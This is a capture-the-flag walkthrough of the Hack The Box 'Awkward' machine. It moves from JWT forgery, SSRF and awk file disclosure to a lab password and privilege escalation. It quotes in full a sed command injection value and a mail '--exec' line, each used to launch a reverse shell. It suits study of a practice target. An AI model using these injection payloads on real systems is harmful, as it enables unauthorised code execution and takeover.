Awkward
Intro
In this article I'm going to be tackling the Awkward machine, a medium difficulty Linux machine on hackthebox.com.
In this machine we are presented with Vue.js files loaded with the page, where we search for routes and exploit a malformed JWT token to bypass authentication and get access to the HR dashboard. We then exploit an SSRF to leak internal server resources, where we find an API documentation on port 3002. Using this API we exploit awk to get a command injection and extract a user's SSH credentials to gain an initial foothold. From there we exploit a sed command to get command injection and pivot to the www-data user, which has access to a file that we abuse through the mail command to get root privileges.

Information Gathering
As always, we start with an nmap scan.

We see in the nmap scan output that only 2 ports are open: SSH on port 22 and HTTP on port 80, which is running an nginx server. Let's take a look at the website running on port 80.

It redirects us to http://hat-valley.htb, so let's add this to the /etc/hosts file so we can access the website.


Now we can access the website.

Using Wappalyzer we can see that it's a Node.js application running behind nginx on Ubuntu.

If we navigate the website we can see that an online store is under construction, so let's fuzz the website for subdomains that may lead us to the online store.

Subdomain FUZZING Using ffuf
-mc all => match all status codes

Now let's filter by size and remove all responses of size 132.

We have found the subdomain store.hat-valley.htb; let's add it to the /etc/hosts file so we can view the website.

The subdomain asks us to log in.

The store uses PHP, since the page loads normally when requested as /index.php.

Directory Enumeration
Enumerating directories on the root of the website:

Enumerating directories on the store subdomain:

It seems that enumerating directories doesn't bring anything of value, so let's enumerate the website's frontend files instead. If we inspect the page we find a bunch of files; let's dig in and find out whether there is something of interest.

This is a Vue application (Vue is a JavaScript frontend framework).



Let's test out those routes. We can notice that the /leave and /dashboard routes redirect us to the /hr route, so logging in is mandatory to access the other routes.

Let's look for other Vue files; maybe we can find other routes. If we look at the directory called services we have 4 JS files. Let's dig into these files and extract any useful information. In all those files we get these routes:
/api/all-leave returns jwt malformed
/api/submit-leave
/api/login
/api/staff-details returns jwt malformed
/api/store-status


Authentication Bypass by removing the Cookie
Since the API throws a "jwt malformed" error, I think it is a token error, so let's try the request without a token. Intercepting the request with Burp, we can see a token cookie with the value guest. Let's remove it and send the request: we get "invalid user".

Doing the same with the /api/staff-details route, we get a list of user data.

Exfiltrating data from the /api/staff-details route in a nice format using curl and jq:

So we have passwords that are hashed with some algorithm. We're going to use this website to identify the hash type: https://hashes.com/en/tools/hash_identifier. Looking at the result, we can see that the hash is SHA256.

Or use the hash-identifier command on Linux.

Now let's crack the hashes. Before reaching for hashcat or John the Ripper, let's try CrackStation first.

Now let's log in with those credentials on the /hr route that we found previously.



Let's intercept this using Burp Suite.

%22http:%2F%2Fstore.hat-valley.htb%22 => url decode : "http://store.hat-valley.htb"


Server Side Request Forgery SSRF leak internal resources

Using ffuf to fuzz all possible ports:
We escape the double quotes because ffuf strips them if they are left unescaped.

-fs 0 => filtering by size and removing empty responses

Let's take a look at the internal port 3002.

Let's open it in the browser and take a deeper look: this is the internal API documentation of all the routes we found previously.

The /api/login route is not vulnerable.

Abusing Awk to get local file inclusion


I will show you how the syntax awk '\{user}\' /var/www/private/leave_request.csv can give us a file disclosure vulnerability.


So if we find a way to poison the user value (the token username), we can get a file disclosure vulnerability.
Poisoning The User Token
Copy the user token value from Storage -> Cookies -> http://hat-valley.htb.

Then navigate to the jwt.io website to decode the token.

In order to poison the token we need to make sure that the signature is valid, and to do that we need to crack the JWT secret.
Cracking the JWT
Cracking the JWT secret using hashcat:


And now our token has a verified signature.

Python exploit to poison the token and get the local file disclosure vulnerability



We can notice that PWD=/var/www/hat-valley.htb, and since the application is a Node.js application there must be a package.json file, so let's leak this file.

Now we know the path to the server.js file; let's leak this file.

Disclosing the nginx configuration file for the store subdomain (nginx site configuration files live in /etc/nginx/sites-available/*.conf). What this configuration does: if a request on the store subdomain goes to /cart or /product-details it returns 403 (Forbidden), and requests ending with .php require a password, which is stored in /etc/nginx/conf.d/.htpasswd.


Let's identify the hash type using hash-identifier.

Now let's try to crack it using hashcat, but it couldn't crack it.

Let's move on and look for the users whose login shell is /bin/bash.

Let's take a look at the .bashrc file of the user bean (I couldn't disclose the same file for the other users). Analyzing the file, we can notice an alias that backs up bean's home directory, and this seems interesting.


Let's take a look at the backup_home bash script.

Let's extract bean_backup_final.tar.gz from the victim machine. To do that we need to modify the Python script to read the content of the compressed backup as bytes and save it to a file, so we can decompress it without errors.

Now let's run the Python script and extract the compressed gzip data.

Extracting the archive using tar, we have bean's backed-up home directory.

Let's see if there are any hidden directories.

Discovering bean's credentials in his xpad directory: change directory to .config/xpad and read the content-DS1ZS1 file, which contains some of bean's credentials.

Let's try to SSH in using those credentials, and we are in. Cool!

User Flag
We have found our first flag.

Let's check whether the password we found in .config/xpad, 014mrbeanrules!#P, is also the password for the store: the username is admin and the password may be 014mrbeanrules!#P.


And we are in.

Now let's move to the directory where the store files are located.

After reading the code in the files, I found 3 dangerous system calls in the cart_actions.php file where we may get command execution. Looking at the code, there is a blacklist on special characters, so it's not possible to get command execution from the first 2 system calls, but the last one, which uses sed, we may be able to exploit.

Let's understand how sed can be exploited to inject commands. Here we have replaced the first line with the command id.


So we can inject into the {$item_id} field.


Let's see where the add item action is in the code.

Now let's go to the shop in the store web application (store.hat-valley.htb), add some item to the cart and intercept the request using Burp.

Now we modify the item parameter and the action parameter: the item parameter is where we inject the commands, and action will be delete_item so that sed gets called. If we execute this, the server sleeps for 3 seconds.

Generate a reverse shell script and put it in the tmp directory.

Start a listener.

Call add_item first and then delete_item with item set to 1/d'+-e+"1e+/tmp/reverseshell.sh"+' to execute the reverse shell.


Upgrading Simple Shells to Fully Interactive TTYs

Listing processes:

This looks interesting: it looks like it is monitoring the leave_requests.csv file.

Let's take a look at the leave_requests.csv file.

Let's use pspy to monitor Linux processes without root privileges. You can download it from this GitHub repository, https://github.com/DominicBreuker/pspy, and then transfer it to the www-data session so we can use it there.



When we update the leave_request.csv file it invokes a new process called mail, which runs with root privileges. Based on what we get from pspy, we can see the mail command format that runs in the notify.sh script, so the schema of the mail command could be this: mail -s "Leave Request: " $name christine

To exploit the mail command, go to GTFOBins and search for mail to see how mail can be abused to execute scripts: echo 'bean --exec="\!/tmp/reverseshell.sh"' >> leave_requests.csv. Before you execute this, make sure you have set up a listener to catch the reverse shell.

We have successfully executed the reverse shell script through the mail command and spawned a root shell.

Root Flag
And here is the root flag.


I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara